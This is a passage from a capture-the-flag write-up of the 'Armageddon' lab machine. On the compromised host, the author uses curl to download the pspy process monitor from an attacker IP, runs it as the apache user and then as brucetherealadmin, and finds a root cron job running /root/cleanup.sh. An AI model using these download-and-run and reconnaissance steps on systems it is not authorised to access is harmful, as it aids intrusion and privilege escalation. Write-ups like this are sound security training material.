Armageddon_PSPY

PSPY

---

Since I was unable to enumerate the processes within the system in the usual manner, I will get PSPY running to capture all the system processes

sh-4.2$ curl -s http://10.10.14.2/pspy64 -o /var/tmp/pspy64 ; chmod 755 /var/tmp/pspy64

Delivery complete

sh-4.2$ ./pspy64
sh: ./pspy64: Permission denied

I am unable to execute PSPY as the apache user

[brucetherealadmin@armageddon ~]$ curl -s http://10.10.14.2/pspy64 -o /home/brucetherealadmin/pspy64 ; chmod 755 /home/brucetherealadmin/pspy64

Since I made a lateral movement to the brucetherealadmin user and elevated the shell session, I will re-attempt it as the brucetherealadmin user

[brucetherealadmin@armageddon ~]$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
 
 
     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     
 
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

This time, I am able to execute PSPY as the brucetherealadmin user

There is a root cronjob process, executing a Bash script located at /root/cleanup.sh I am unable to read the bash script as it is located under the home directory of the root user.